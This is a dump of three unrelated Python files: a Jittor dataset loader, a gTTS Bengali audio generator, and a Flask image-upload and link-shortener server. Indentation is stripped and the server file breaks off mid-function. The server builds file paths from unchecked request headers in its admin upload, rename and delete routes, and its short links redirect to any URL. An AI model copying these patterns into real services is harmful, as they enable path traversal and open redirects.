from PIL import Image
import multiprocessing as mp
import signal
from jittor_utils import LOG
import jittor as jt
import time
dataset_root = os.path.join(pathlib.Path.home(), ".cache", "jittor", "dataset")
mp_log_v = os.environ.get("mp_log_v", 0)
mpi = jt.mpi
img_open_hook = HookTimer(Image, "open")
class Worker:
def __init__(self, target, args, buffer_size, keep_numpy_array=False):
self.buffer = jt.RingBuffer(buffer_size)
self.buffer.keep_numpy_array(keep_numpy_array)
self.status = mp.Array('f', 5, lock=False)
self.p = mp.Process(target=target, args=args+(self.buffer,self.status))
self.p.daemon = True
self.p.start()
class Dataset(object):
'''
Base class for reading data.
Args::
[in] batch_size(int): batch size, default 16.
[in] shuffle(bool): shuffle at each epoch, default False.
[in] drop_last(bool): if True, drop the last incomplete batch whose size would be smaller than batch_size; default False.
[in] num_workers(int): number of workers for loading data.
[in] buffer_size(int): buffer size for each worker in bytes, default(512MB).
Example::
class YourDataset(Dataset):
def __init__(self):
super().__init__()
self.set_attrs(total_len=1024)
def __getitem__(self, k):
return k, k*k
dataset = YourDataset().set_attrs(batch_size=256, shuffle=True)
for x, y in dataset:
......
'''
def __init__(self,
batch_size = 16,
shuffle = False,
drop_last = False,
num_workers = 0,
buffer_size = 512*1024*1024,
stop_grad = True,
keep_numpy_array = False):
super().__init__()
if os.environ.get("DISABLE_MULTIPROCESSING", '0') == '1':
num_workers = 0
self.total_len = None
self.batch_size = batch_size
self.shuffle = shuffle
self.drop_last = drop_last
self.num_workers = num_workers
self.buffer_size = buffer_size
self.stop_grad = stop_grad
self.keep_numpy_array = keep_numpy_array
self.sampler = None
def __getitem__(self, index):
raise NotImplementedError
def __batch_len__(self):
assert self.total_len >= 0
assert self.batch_size > 0
if self.drop_last:
return self.total_len // self.batch_size
return (self.total_len-1) // self.batch_size + 1
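# Illustrative note (added, not in the original source): with total_len=10 and
# batch_size=4, drop_last=True gives 10 // 4 = 2 batches, while drop_last=False
# gives (10 - 1) // 4 + 1 = 3 batches, the last of which holds only 2 samples.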
def __len__(self):
return self.__batch_len__()
def set_attrs(self, **kw):
'''
You can set attributes of the dataset by using the set_attrs function, including total_len, batch_size, shuffle, drop_last, num_workers, buffer_size.
Example::
dataset = YourDataset().set_attrs(batch_size=256, shuffle=True)
Attrs:
* batch_size(int): batch size, default 16.
* total_len(int): total length of the dataset.
* shuffle(bool): shuffle at each epoch, default False.
* drop_last(bool): if True, drop the last incomplete batch whose size would be smaller than batch_size; default False.
* num_workers: number of workers for loading data
* buffer_size: buffer size for each worker in bytes, default(512MB).
* stop_grad: stop grad for data, default(True).
'''
for k,v in kw.items():
assert hasattr(self, k), k
setattr(self, k, v)
self.reset()
return self
def to_jittor(self, batch):
'''
Convert batch data such as np.ndarray, int, and float (possibly nested in lists or tuples) into jittor arrays.
'''
if self.keep_numpy_array: return batch
if isinstance(batch, jt.Var): return batch
to_jt = lambda x: jt.array(x).stop_grad() \
if self.stop_grad else jt.array(x)
if isinstance(batch, np.ndarray):
return to_jt(batch)
if not isinstance(batch, (list, tuple)):
return batch
new_batch = []
for a in batch:
if isinstance(a, np.ndarray) or \
isinstance(a, int) or \
isinstance(a, float):
new_batch.append(to_jt(a))
else:
new_batch.append(self.to_jittor(a))
return new_batch
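# Hedged usage sketch (added note, not in the original source): with stop_grad=True,
# to_jittor([np.ones((2, 2)), 3, "label"]) would return the ndarray and the int as
# stop-grad jt.Var objects while the string passes through unchanged, since only
# np.ndarray, int and float elements are converted.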
def collate_batch(self, batch):
'''
Puts each data field into a tensor with outer dimension batch size.
Args::
[in] batch(list): A list of variables, such as jt.var, Image.Image, np.ndarray, int, float, str and so on.
'''
return collate_batch(batch)
def terminate(self):
'''
Terminate is used to terminate multi-process worker reading data.
'''
if hasattr(self, "workers"):
for w in self.workers:
w.p.terminate()
def _worker_main(self, worker_id, buffer, status):
import jittor_utils
jittor_utils.cc.init_subprocess()
jt.jt_init_subprocess()
seed = jt.get_seed()
wseed = (seed ^ worker_id) ^ 1234
jt.set_seed(wseed)
# parallel_op_compiler is still problematic:
# it does not work on Ubuntu 16.04 but works on Ubuntu 20.04.
# It seems the static state of the parallel compiler
# is not initialized correctly.
jt.flags.use_parallel_op_compiler = 0
import time
try:
gid_obj = self.gid.get_obj()
gid_lock = self.gid.get_lock()
start = time.time()
while True:
# get id
with gid_lock:
while gid_obj.value >= self.batch_len or buffer.is_stop():
self.num_idle.value += 1
self.num_idle_c.notify()
self.gidc.wait()
self.num_idle.value -= 1
cid = gid_obj.value
self.idmap[cid] = worker_id
gid_obj.value += 1
self.gidc.notify()
now = time.time()
other_time = now - start
start = now
# load and transform data
batch = []
if mp_log_v:
print(f"#{worker_id} {os.getpid()} load batch", cid*self.real_batch_size, min(self.real_len, (cid+1)*self.real_batch_size))
for i in range(cid*self.real_batch_size, min(self.real_len, (cid+1)*self.real_batch_size)):
batch.append(self[self.index_list[i]])
batch = self.collate_batch(batch)
now = time.time()
data_time = now - start
start = now
# send data to main process
if mp_log_v:
print(f"#{worker_id} {os.getpid()} send", type(batch).__name__, [ type(b).__name__ for b in batch ], buffer)
try:
buffer.send(batch)
except:
if buffer.is_stop():
continue
raise
now = time.time()
send_time = now - start
start = now
status[0], status[1], status[2], status[3], status[4] = \
other_time, data_time, send_time, \
other_time + data_time + send_time, \
img_open_hook.duration
img_open_hook.duration = 0.0
except:
import traceback
line = traceback.format_exc()
print(line)
os.kill(os.getppid(), signal.SIGINT)
exit(0)
def display_worker_status(self):
''' Display dataset worker status. When dataset.num_workers > 0, it will display information like the example below:
.. code-block:: console
progress:479/5005
batch(s): 0.302 wait(s):0.000
recv(s): 0.069 to_jittor(s):0.021
recv_raw_call: 6720.0
last 10 workers: [6, 7, 3, 0, 2, 4, 7, 5, 6, 1]
ID wait(s) load(s) send(s) total
#0 0.000 1.340 2.026 3.366 Buffer(free=0.000% l=462425368 r=462425368 size=536870912)
#1 0.000 1.451 3.607 5.058 Buffer(free=0.000% l=462425368 r=462425368 size=536870912)
#2 0.000 1.278 1.235 2.513 Buffer(free=0.000% l=462425368 r=462425368 size=536870912)
#3 0.000 1.426 1.927 3.353 Buffer(free=0.000% l=462425368 r=462425368 size=536870912)
#4 0.000 1.452 1.074 2.526 Buffer(free=0.000% l=462425368 r=462425368 size=536870912)
#5 0.000 1.422 3.204 4.625 Buffer(free=0.000% l=462425368 r=462425368 size=536870912)
#6 0.000 1.445 1.953 3.398 Buffer(free=0.000% l=462425368 r=462425368 size=536870912)
#7 0.000 1.582 0.507 2.090 Buffer(free=0.000% l=308283552 r=308283552 size=536870912)
Meaning of the outputs:
* progress: dataset loading progress (current/total)
* batch: batch time, exclude data loading time
* wait: time of main proc wait worker proc
* recv: time of recv batch data
* to_jittor: time of batch data to jittor variable
* recv_raw_call: total number of underlying recv_raw called
* last 10 workers: id of last 10 workers which main proc load from.
* table meaning
* ID: worker id
* wait: worker wait time
* open: worker image open time
* load: worker load time
* buffer: ring buffer status, such as how much free space is left, the left index, the right index, and the total size (bytes).
Example::
from jittor.dataset import Dataset
class YourDataset(Dataset):
pass
dataset = YourDataset().set_attrs(num_workers=8)
for x, y in dataset:
dataset.display_worker_status()
'''
if not hasattr(self, "workers"):
return
msg = [""]
msg.append(f"progress:{self.last_id}/{self.batch_len}")
msg.append(f"batch(s): {self.batch_time:.3f}\twait(s):{self.wait_time:.3f}")
msg.append(f"recv(s): {self.recv_time:.3f}\tto_jittor(s):{self.to_jittor_time:.3f}")
msg.append(f"last 10 workers: {self.idmap[max(0, self.last_id-9):self.last_id+1]}")
msg.append(f"ID\twait(s)\topen(s)\tload(s)\tsend(s)\ttotal(s)")
for i in range(self.num_workers):
w = self.workers[i]
s = w.status
msg.append(f"#{i}\t{s[0]:.3f}\t{s[4]:.3f}\t{s[1]:.3f}\t{s[2]:.3f}\t{s[3]:.3f}\t{w.buffer}")
LOG.i('\n'.join(msg))
def _stop_all_workers(self):
# stop workers
for w in self.workers:
w.buffer.stop()
# wait until all workers idle
if self.num_idle.value < self.num_workers:
with self.gid.get_lock():
self.gid.get_obj().value = self.batch_len
if mp_log_v:
print("idle num", self.num_idle.value)
while self.num_idle.value < self.num_workers:
self.num_idle_c.wait()
if mp_log_v:
print("idle num", self.num_idle.value)
# clean workers' buffer
for w in self.workers:
w.buffer.clear()
def _init_workers(self):
jt.clean()
jt.gc()
self.index_list = mp.Array('i', self.real_len, lock=False)
workers = []
# batch id to worker id
self.idmap = mp.Array('i', self.batch_len, lock=False)
# global token index
self.gid = mp.Value('i', self.batch_len)
# global token index condition
self.gidc = mp.Condition(self.gid.get_lock())
# number of idle workers
self.num_idle = mp.Value('i', 0, lock=False)
# number of idle workers condition
self.num_idle_c = mp.Condition(self.gid.get_lock())
for i in range(self.num_workers):
w = Worker(target=self._worker_main, args=(i,),
buffer_size=self.buffer_size,
keep_numpy_array=self.keep_numpy_array)
workers.append(w)
self.workers = workers
self.index_list_numpy = np.ndarray(dtype='int32', shape=self.real_len, buffer=self.index_list)
def reset(self):
if not hasattr(self, "workers"):
return
self._stop_all_workers()
self.terminate()
del self.index_list
del self.idmap
del self.gid
del self.gidc
del self.num_idle
del self.num_idle_c
del self.workers
del self.index_list_numpy
def __del__(self):
if mp_log_v:
print("dataset deleted")
self.terminate()
def __real_len__(self):
if self.total_len is None:
self.total_len = len(self)
return self.total_len
def __iter__(self):
if self.total_len is None:
self.total_len = len(self)
# maybe rewrite by sampler
total_len = self.total_len
if self.sampler:
index_list = list(self.sampler.__iter__())
total_len = len(index_list)
# check is not batch sampler
if len(index_list):
assert not isinstance(index_list[0], (list,tuple)), "Batch sampler not support yet."
elif self.shuffle == False:
index_list = get_order_list(self.total_len)
else:
index_list = get_random_list(self.total_len)
# scatter index_list for all mpi process
# scatter rule:
# batch 1 batch 2
# [........] [........] ...
# 00011122 00011122
# if last batch is smaller than world_size
# pad to world_size
# last batch
# [.] -> [012]
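# Worked example of the scatter rule above (added note, not in the original source):
# with batch_size=8 and world_size=3, real_batch_size = (8 - 1) // 3 + 1 = 3, so within
# every full batch rank 0 takes columns 0-2, rank 1 takes columns 3-5 and rank 2 takes
# the remaining columns 6-7, matching the '00011122' pattern sketched above.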
if jt.in_mpi:
world_size = mpi.world_size()
world_rank = mpi.world_rank()
index_list = np.int32(index_list)
mpi.broadcast(index_list, 0)
assert self.batch_size >= world_size, \
f"Batch size({self.batch_size}) is smaller than MPI world_size({world_size})"
real_batch_size = (self.batch_size-1) // world_size + 1
if real_batch_size * world_size != self.batch_size:
LOG.w("Batch size is not divisible by MPI world size, "
"The distributed version may be different from "
"the single-process version.")
fix_batch = total_len // self.batch_size
last_batch = total_len - fix_batch * self.batch_size
fix_batch_l = index_list[0:fix_batch*self.batch_size] \
.reshape(-1,self.batch_size)
fix_batch_l = fix_batch_l[
:,real_batch_size*world_rank:real_batch_size*(world_rank+1)]
real_batch_size = fix_batch_l.shape[1]
fix_batch_l = fix_batch_l.flatten()
if not self.drop_last and last_batch > 0:
last_batch_l = index_list[-last_batch:]
real_last_batch = (last_batch-1)//world_size+1
l = real_last_batch * world_rank
r = l + real_last_batch
if r > last_batch: r = last_batch
if l >= r: l = r-1
index_list = np.concatenate([fix_batch_l, last_batch_l[l:r]])
else:
index_list = fix_batch_l
self.real_len = len(index_list)
self.real_batch_size = real_batch_size
assert total_len // self.batch_size == \
self.real_len // self.real_batch_size, f"Number of batches({total_len // self.batch_size}!={self.real_len // self.real_batch_size}) not match, total_len: {total_len}, batch_size: {self.batch_size}, real_len: {self.real_len}, real_batch_size: {self.real_batch_size}"
else:
self.real_len = self.total_len
self.real_batch_size = self.batch_size
self.batch_len = self.__batch_len__()
if not hasattr(self, "workers") and self.num_workers:
self._init_workers()
if self.num_workers:
self._stop_all_workers()
self.index_list_numpy[:] = index_list
gid_obj = self.gid.get_obj()
gid_lock = self.gid.get_lock()
with gid_lock:
gid_obj.value = 0
self.gidc.notify_all()
start = time.time()
self.batch_time = 0
for i in range(self.batch_len):
# try not get lock first
if gid_obj.value <= i:
with gid_lock:
if gid_obj.value <= i:
if mp_log_v:
print("wait")
self.gidc.wait()
now = time.time()
self.wait_time = now - start
start = now
self.last_id = i
worker_id = self.idmap[i]
w = self.workers[worker_id]
if mp_log_v:
print(f"#{worker_id} {os.getpid()} recv buffer", w.buffer)
batch = w.buffer.recv()
now = time.time()
self.recv_time = now - start
start = now
if mp_log_v:
print(f"#{worker_id} {os.getpid()} recv", type(batch).__name__, [ type(b).__name__ for b in batch ])
batch = self.to_jittor(batch)
now = time.time()
self.to_jittor_time = now - start
start = now
yield batch
now = time.time()
self.batch_time = now - start
start = now
else:
batch_data = []
for idx in index_list:
batch_data.append(self[int(idx)])
if len(batch_data) == self.real_batch_size:
batch_data = self.collate_batch(batch_data)
batch_data = self.to_jittor(batch_data)
yield batch_data
batch_data = []
# depend on drop_last
if not self.drop_last and len(batch_data) > 0:
batch_data = self.collate_batch(batch_data)
batch_data = self.to_jittor(batch_data)
yield batch_data
class ImageFolder(Dataset):
"""
An image classification dataset that loads images and labels from a directory::
* root/label1/img1.png
* root/label1/img2.png
* ...
* root/label2/img1.png
* root/label2/img2.png
* ...
Args::
[in] root(string): Root directory path.
Attributes::
* classes(list): List of the class names.
* class_to_idx(dict): map from class_name to class_index.
* imgs(list): List of (image_path, class_index) tuples
Example::
train_dir = './data/celebA_train'
train_loader = ImageFolder(train_dir).set_attrs(batch_size=batch_size, shuffle=True)
for batch_idx, (x_, target) in enumerate(train_loader):
...
"""
def __init__(self, root, transform=None):
super().__init__()
self.root = root
self.transform = transform
self.classes = sorted([d.name for d in os.scandir(root) if d.is_dir()])
self.class_to_idx = {v:k for k,v in enumerate(self.classes)}
self.imgs = []
image_exts = set(('.jpg', '.jpeg', '.png', '.bmp', '.tif', '.tiff'))
for i, class_name in enumerate(self.classes):
class_dir = os.path.join(root, class_name)
for dname, _, fnames in sorted(os.walk(class_dir, followlinks=True)):
for fname in sorted(fnames):
if os.path.splitext(fname)[-1].lower() in image_exts:
path = os.path.join(class_dir, fname)
self.imgs.append((path, i))
LOG.i(f"Found {len(self.classes)} classes and {len(self.imgs)} images.")
self.set_attrs(total_len=len(self.imgs))
def __getitem__(self, k):
with open(self.imgs[k][0], 'rb') as f:
img = Image.open(f).convert('RGB')
if self.transform:
img = self.transform(img)
return img, self.imgs[k][1]
|
dataGenMulti.py
|
import threading
from queue import Queue
from gtts import gTTS
import pandas as pd
LABELPATH = 'C:\\Data\\bn_bd\\line_index.tsv'
SAVEPATH = 'C:\\Data\\bn_bd\\synthWav\\'
max_threads = 100
def getWav(q):
while True:
info = q.get()
fileID = info[0]
text = info[1]
print('Requesting TTS for file: ' + fileID)
tts = gTTS(text, lang='bn')
print('TTS Complete, Saving ...')
tts.save(SAVEPATH + fileID + '_synth.wav')
print(fileID + ': Complete')
q.task_done()
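# Added note (hedged): each queued item is one row of line_index.tsv read with
# header=None, so info[0] is the clip/file ID and info[1] is the Bengali sentence
# handed to gTTS. gTTS itself returns MP3-encoded audio, so the files saved with a
# '.wav' suffix above actually contain MP3 data.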
que_files = Queue()
df = pd.read_csv(LABELPATH,delimiter='\t', header = None)
for i in range(max_threads -1):
t = threading.Thread(target = getWav, args = (que_files,))
t.daemon = True
t.start()
for index, row in df.iterrows():
que_files.put(row)
que_files.join()
|
Image_Uploader.py
|
try:
from flask import render_template, jsonify, request, Flask, send_from_directory, redirect
import json, time, random, requests, os
import secrets
import discord
from discord.ext import commands
from discord.ext.commands import bot
import asyncio
import aiohttp
import requests
import datetime
import threading
import logging
from yaspin import yaspin
from yaspin.spinners import Spinners
from flask_basicauth import BasicAuth
import DiscordObjects
import APIkeyManagement
import shutil
import urllib
except ImportError as e:
print(u"\u001b[31mFailed to import module: '" + e.name + "'. Please make sure all dependencies that are in 'requirements.txt' are installed and try again.\u001b[0m")
exit()
spinner = yaspin()
spinner.spinner = Spinners.line
print("""
=======================
ImageUploader
Developed by
Lewis L. Foster
sniff122
V: 2.0.0
=======================
""")
try:
with open("Config.json") as f:
Config = json.load(f)
except FileNotFoundError:
print(u"\u001b[31mThe 'Config.json' file was not found, copying file from 'Config.example.json'\u001b[0m")
try:
shutil.copyfile(r"Config.example.json", r"Config.json")
except:
print(u"\u001b[31mThe 'Config.example.json' file was not found, downloading from GitHub\u001b[0m")
urllib.request.urlretrieve(
"https://raw.githubusercontent.com/sniff122Development/ImageUploader/master/Config.example.json",
"Config.json")
print(
u"\u001b[31mDone! Exiting application, please edit 'Config.json' and restart. If you need assistance, please see https://github.com/sniff122Development/ImageUploader/wiki\u001b[0m")
exit()
PROJECT_HOME = os.path.dirname(os.path.realpath(__file__))
UPLOAD_DIRECTORY = PROJECT_HOME + "/" + Config["webserver"]["upload_directory"]
CONFIG_DIRECTORY = PROJECT_HOME + "/" + Config["webserver"]["data_directory"]
if not os.path.exists(str(CONFIG_DIRECTORY)):
os.mkdir(CONFIG_DIRECTORY)
if os.path.exists(str(CONFIG_DIRECTORY + "/APIKeys.json")):
with open(str(CONFIG_DIRECTORY + "/APIKeys.json"), "r") as f:
apikeys = json.load(f)
else:
with open(str(CONFIG_DIRECTORY + "/APIKeys.json"), "w") as f:
f.write("{}")
f.close()
with open(str(CONFIG_DIRECTORY + "/APIKeys.json"), "r") as f:
apikeys = json.load(f)
if os.path.exists(str(CONFIG_DIRECTORY + "/files.json")):
with open(str(CONFIG_DIRECTORY + "/files.json"), "r") as f:
files = json.load(f)
else:
with open(str(CONFIG_DIRECTORY + "/files.json"), "w") as f:
f.write("{}")
f.close()
with open(str(CONFIG_DIRECTORY + "/files.json"), "r") as f:
files = json.load(f)
if os.path.exists(str(CONFIG_DIRECTORY + "/shortlinks.json")):
with open(str(CONFIG_DIRECTORY + "/shortlinks.json"), "r") as f:
shortlinks = json.load(f)
else:
with open(str(CONFIG_DIRECTORY + "/shortlinks.json"), "w") as f:
f.write("{}")
f.close()
with open(str(CONFIG_DIRECTORY + "/shortlinks.json"), "r") as f:
shortlinks = json.load(f)
def saveconfigs(keys, filetokens, shortlinks):
with open(str(CONFIG_DIRECTORY + "/APIKeys.json"), "w") as f:
json.dump(keys, f, indent=4)
with open(str(CONFIG_DIRECTORY + "/files.json"), "w") as f:
json.dump(filetokens, f, indent=4)
with open(str(CONFIG_DIRECTORY + "/shortlinks.json"), "w") as f:
json.dump(shortlinks, f, indent=4)
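# Added summary (inferred from how these structures are used below, not authoritative):
# APIKeys.json maps an API key to {"file-names": [...], "short-urls": [...]},
# files.json maps an uploaded filename to the API key that owns it, and
# shortlinks.json maps a short link ID to {"url": <target>, "key": <owning API key>}.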
# =============================
# ==========WEBSERVER==========
# =============================
port = Config["webserver"]["port"]
listen_address = Config["webserver"]["listen"]
app = Flask(__name__)
app.config['BASIC_AUTH_USERNAME'] = Config["webserver"]["admin_auth"]["username"]
app.config['BASIC_AUTH_PASSWORD'] = Config["webserver"]["admin_auth"]["password"]
basic_auth = BasicAuth(app)
WEBROOT = Config["webserver"]["webroot"]
RecentFile = ""
def apikeyvalid(key):
if key in apikeys:
return True
else:
return False
def checkiffileexists(filename):
if filename in shortlinks:
return True
else:
return False
@app.route("/", methods=['GET'])
def web_root():
return render_template("index.htm", uploadapi=str(WEBROOT + "/api/upload"), linkshortapi=str(WEBROOT + "/api/url"), webroot=str(WEBROOT))
@app.route("/js/<jstype>", methods=["GET"])
def return_js(jstype):
if jstype in ["admin_files.js", "admin_keys.js", "admin_links.js"]:
return send_from_directory("JS", jstype)
else:
return jsonify({"Status": 404, "Message": "Not Found"})
@app.route("/api/upload", methods=["POST"])
def upload_file():
apikey = str(request.headers.get("Auth"))
if apikeyvalid(str(apikey)):
if request.files["file"]:
uploadfile = request.files["file"]
filename = uploadfile.filename
filenamesplit = str(filename).split(".")
ext = str(filenamesplit[len(filenamesplit) - 1])
filetoken = str(secrets.token_hex(10))
while checkiffileexists(filetoken):
filetoken = str(secrets.token_hex(10))
filename = filetoken + "." + ext
savepath = os.path.join(UPLOAD_DIRECTORY, filename)
try:
uploadfile.save(savepath)
except:
os.mkdir(UPLOAD_DIRECTORY)
uploadfile.save(savepath)
apikeys[apikey]["file-names"].append(filename)
files[filename] = apikey
saveconfigs(apikeys, files, shortlinks)
if Config["bot"]["Enabled"] == "True":
embed = DiscordObjects.DiscordEmbed(title="New Image Uploaded", description="There is a new image!",
footer=DiscordObjects.EmbedFooter(""), colour=0xffffff,
image=DiscordObjects.EmbedImage(
str("https://" + request.headers['Host'] + "/uploads/" + filename)),
author=DiscordObjects.EmbedAuthor("ImageUploader"), fields=[
DiscordObjects.EmbedField(name="URL:", value=str("https://" + request.headers['Host'] + "/uploads/" + filename),
inline=False)], thumbnail=DiscordObjects.EmbedImage(
str("https://" + request.headers['Host'] + "/uploads/" + filename)))
webhookcontent = DiscordObjects.DiscordWebhookContent(username="ImageUploader",
avatar_url=Config["bot"]["webhook"]["avatar_url"],
tts=False, embed=[embed])
DiscordObjects.WebhookPost(Config["bot"]["webhook"]["url"], webhookcontent)
global RecentFile
RecentFile = str("https://" + request.headers['Host'] + "/uploads/" + filename)
return jsonify({"Status": 200, "Message": "OK", "FileLink": str("https://" + request.headers['Host'] + "/uploads/" + filename)})
else:
return jsonify({"Status": 403, "Message": "Forbidden - No file provided"})
else:
return jsonify({"Status": 401, "Message": "Unauthorized"})
@app.route("/api/url", methods=["POST"])
def shorten_link():
apikey = str(request.headers.get("Auth"))
if apikeyvalid(apikey):
url = str(request.headers.get("url"))
if url:
exists = False
for urlid in shortlinks:
if url == shortlinks[urlid]:
exists = True
break
else:
continue
if not exists:
urlid = str(secrets.token_hex(4))
while urlid in shortlinks:
urlid = str(secrets.token_hex(4))
try:
apikeys[apikey]["short-urls"].append(urlid)
except:
apikeys[apikey]["short-urls"] = [urlid]
shortlinks[urlid] = {"url": url, "key": apikey}
saveconfigs(apikeys, files, shortlinks)
return jsonify({"Status": 200, "Message": "OK", "shorturl": str("https://" + request.headers['Host'] + "/link/" + urlid)})
else:
return jsonify({"Status": 403, "Message": "Forbidden - No url provided"})
else:
return jsonify({"Status": 401, "Message": "Unauthorized"})
@app.route("/uploads/<file>", methods=['GET'])
def get_file(file):
try:
try:
check = files[file]
except KeyError:
return jsonify({"Status": 404, "Message": "Not Found"})
return send_from_directory(UPLOAD_DIRECTORY, file)
except:
return jsonify({"Status": 500, "Message": "Internal Server Error"})
@app.route("/link/<link>", methods=["GET"])
def get_link(link):
try:
if link in shortlinks:
return redirect(shortlinks[link]["url"])
else:
return jsonify({"Status": 404, "Message": "Not Found"})
except:
return jsonify({"Status": 500, "Message": "Internal Server Error"})
# ==WEBSERVER=ADMIN==
@app.route("/admin", methods=['GET'])
@basic_auth.required
def admin_root():
return render_template("admin.htm",
webroot=WEBROOT,
recentfile=RecentFile)
@app.route("/api/admin/listfiles", methods=["GET"])
def admin_get_files():
username = str(request.headers.get("username"))
password = str(request.headers.get("password"))
if (username == Config["webserver"]["admin_auth"]["username"]) and (
password == Config["webserver"]["admin_auth"]["password"]):
filelist = []
for filename in files:
filelist.append(filename)
return jsonify({"Status": 200, "Message": "Ok", "files": filelist})
else:
return jsonify({"Status": 401, "Message": "Unauthorized"})
@app.route("/api/admin/listlinks", methods=["GET"])
def admin_get_links():
username = str(request.headers.get("username"))
password = str(request.headers.get("password"))
if (username == Config["webserver"]["admin_auth"]["username"]) and (
password == Config["webserver"]["admin_auth"]["password"]):
linklist = []
for linkid in shortlinks:
linklist.append(linkid)
return jsonify({"Status": 200, "Message": "Ok", "links": linklist})
else:
return jsonify({"Status": 401, "Message": "Unauthorized"})
@app.route("/api/admin/uploadfile", methods=["POST"])
def admin_upload_file():
apikey = str(request.headers.get("Auth"))
username = str(request.headers.get("username"))
password = str(request.headers.get("password"))
if (username == Config["webserver"]["admin_auth"]["username"]) and (
password == Config["webserver"]["admin_auth"]["password"]) and apikeyvalid(str(apikey)):
if request.files["file"]:
filename = str(request.headers.get('FileName'))
file = request.files["file"]
savepath = os.path.join(UPLOAD_DIRECTORY, filename)
file.save(savepath)
apikeys[apikey]["file-names"].append(filename)
files[filename] = apikey
saveconfigs(apikeys, files, shortlinks)
if Config["bot"]["Enabled"] == "True":
embed = DiscordObjects.DiscordEmbed(title="New Image Uploaded", description="There is a new image!",
footer=DiscordObjects.EmbedFooter("There be a new image!"),
colour=0xffffff, image=DiscordObjects.EmbedImage(
str("https://" + request.headers['Host'] + "/uploads/" + filename)), author=DiscordObjects.EmbedAuthor("ImageUploader"),
fields=[DiscordObjects.EmbedField(name="URL:", value=str(
"https://" + request.headers['Host'] + "/uploads/" + filename), inline=False)],
thumbnail=DiscordObjects.EmbedImage(
str("https://" + request.headers['Host'] + "/uploads/" + filename)))
webhookcontent = DiscordObjects.DiscordWebhookContent(username="ImageUploader",
avatar_url=Config["bot"]["webhook"]["avatar_url"],
tts=False, embed=[embed])
DiscordObjects.WebhookPost(Config["bot"]["webhook"]["url"], webhookcontent)
global RecentFile
RecentFile = str("https://" + request.headers['Host'] + "/uploads/" + filename)
return jsonify({"Status": 200, "Message": "OK", "FileLink": str("https://" + request.headers['Host'] + "/uploads/" + filename)})
else:
return jsonify({"Status": 403, "Message": "Forbidden", "Extra Info": "No File Provided"})
else:
return jsonify({"Status": 401, "Message": "Unauthorized"})
@app.route("/api/admin/url", methods=["POST"])
def admin_new_url():
apikey = str(request.headers.get("Auth"))
username = str(request.headers.get("username"))
password = str(request.headers.get("password"))
if (username == Config["webserver"]["admin_auth"]["username"]) and (
password == Config["webserver"]["admin_auth"]["password"]) and apikeyvalid(str(apikey)):
url = str(request.headers.get("url"))
if url:
try:
index = apikeys[apikey]["short-urls"].index(request.headers.get("id"))
return jsonify({"Status": 403, "Message": "Forbidden - Link ID already exists"})
except:
try:
apikeys[apikey]["short-urls"].append(request.headers.get("id"))
except:
apikeys[apikey]["short-urls"] = [request.headers.get("id")]
shortlinks[request.headers.get("id")] = {"url": url, "key": apikey}
saveconfigs(apikeys, files, shortlinks)
return jsonify(
{"Status": 200, "Message": "OK", "shorturl": str("https://" + request.headers['Host'] + "/link/" + request.headers.get("id"))})
else:
return jsonify({"Status": 403, "Message": "Forbidden - No url provided"})
else:
return jsonify({"Status": 401, "Message": "Unauthorized"})
@app.route("/api/admin/deletefile", methods=["DELETE"])
def admin_delete_file():
apikey = str(request.headers.get("Auth"))
username = str(request.headers.get("username"))
password = str(request.headers.get("password"))
filename = str(request.headers.get("filename"))
if (username == Config["webserver"]["admin_auth"]["username"]) and (
password == Config["webserver"]["admin_auth"]["password"]) and apikeyvalid(str(apikey)):
try:
oldpath = os.path.join("data", "uploads", filename)
os.remove(oldpath)
apikey = files[filename]
del files[filename]
fileindex = apikeys[apikey]["file-names"].index(filename)
del apikeys[apikey]["file-names"][fileindex]
saveconfigs(apikeys, files, shortlinks)
return jsonify({"Status": 200, "Message": "OK"})
except FileNotFoundError:
return jsonify({"Status": 404, "Message": "Not Found"})
else:
return jsonify({"Status": 401, "Message": "Unauthorized"})
@app.route("/api/admin/deletelink", methods=["DELETE"])
def admin_delete_link():
apikey = str(request.headers.get("Auth"))
username = str(request.headers.get("username"))
password = str(request.headers.get("password"))
lid = str(request.headers.get("id"))
if (username == Config["webserver"]["admin_auth"]["username"]) and (
password == Config["webserver"]["admin_auth"]["password"]) and apikeyvalid(str(apikey)):
try:
apikey = shortlinks[lid]["key"]
del shortlinks[lid]
linkindex = apikeys[apikey]["short-urls"].index(lid)
del apikeys[apikey]["short-urls"][linkindex]
saveconfigs(apikeys, files, shortlinks)
return jsonify({"Status": 200, "Message": "OK"})
except KeyError:
return jsonify({"Status": 404, "Message": "Not Found"})
else:
return jsonify({"Status": 401, "Message": "Unauthorized"})
@app.route("/api/admin/renamefile", methods=["PUT"])
def admin_rename_file():
apikey = str(request.headers.get("Auth"))
username = str(request.headers.get("username"))
password = str(request.headers.get("password"))
oldfilename = str(request.headers.get("oldfilename"))
newfilename = str(request.headers.get("newfilename"))
if (username == Config["webserver"]["admin_auth"]["username"]) and (
password == Config["webserver"]["admin_auth"]["password"]) and apikeyvalid(str(apikey)):
try:
oldpath = os.path.join(UPLOAD_DIRECTORY, oldfilename)
newpath = os.path.join(UPLOAD_DIRECTORY, newfilename)
os.rename(oldpath, newpath)
apikey = files[oldfilename]
del files[oldfilename]
files[newfilename] = apikey
fileindex = apikeys[apikey]["file-names"].index(oldfilename)
del apikeys[apikey]["file-names"][fileindex]
apikeys[apikey]["file-names"].append(newfilename)
saveconfigs(apikeys, files, shortlinks)
return jsonify({"Status": 200, "Message": "OK", "NewLink": f"{WEBROOT}/uploads/{newfilename}"})
except FileNotFoundError:
return jsonify({"Status": 404, "Message": "Not Found"})
else:
return jsonify({"Status": 401, "Message": "Unauthorized"})
@app.route("/api/admin/renamelink", methods=["PUT"])
def admin_rename_link():
apikey = str(request.headers.get("Auth"))
username = str(request.headers.get("username"))
password = str(request.headers.get("password"))
oldid = str(request.headers.get("oldid"))
newid = str(request.headers.get("newid"))
if (username == Config["webserver"]["admin_auth"]["username"]) and (
password == Config["webserver"]["admin_auth"]["password"]) and apikeyvalid(str(apikey)):
try:
oldobj = shortlinks[oldid]
del shortlinks[oldid]
shortlinks[newid] = oldobj
fileindex = apikeys[apikey]["short-urls"].index(oldid)
apikeys[apikey]["short-urls"].pop(fileindex)
apikeys[apikey]["short-urls"].append(newid)
saveconfigs(apikeys, files, shortlinks)
return jsonify({"Status": 200, "Message": "OK", "NewLink": f"{WEBROOT}/uploads/{newid}"})
except Exception as e:
print(e)
return jsonify({"Status": 404, "Message": "Not Found"})
else:
return jsonify({"Status": 401, "Message": "Unauthorized"})
@app.route("/api/admin/newkey", methods=["GET"])
def admin_new_key():
username = str(request.headers.get("username"))
password = str(request.headers.get("password"))
name = str(request.headers.get("name"))
